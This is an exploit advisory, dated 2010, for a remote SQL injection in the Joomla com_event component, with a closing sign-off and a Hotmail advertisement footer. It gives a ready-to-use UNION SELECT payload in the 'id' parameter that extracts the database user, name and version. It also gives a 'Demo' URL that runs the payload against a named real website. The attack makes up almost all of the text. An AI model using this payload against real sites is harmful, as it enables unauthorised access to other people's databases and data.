The Joomla Event component suffers from a remote SQL injection vulnerability.
7cdc2b00c9df9b41f2861c625b7e0904956dffbe726b6312d9e12a203909245d
# Exploit Title: Joomla Component com_event another sql injection vuln
# Date: 17/5/2010
# Author: N/A
# Software Link: www.joomla.org/download.html
# Version: Multible versions
# Code :
The Attacker Can Exploit A SQL injection vuln in the following:
The Sql injection query:
index.php?option=com_event&task=view&id=-14 UnioN/**/SelECt 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
Demo:
http://cbscommunitycenter.com/index.php?option=com_event&task=view&id=-14%20UnioN/**/SelECt%201,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4--
Thanks To All Muslims
h8k@hotmail.it
_________________________________________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection.
https://signup.live.com/signup.aspx?id=60969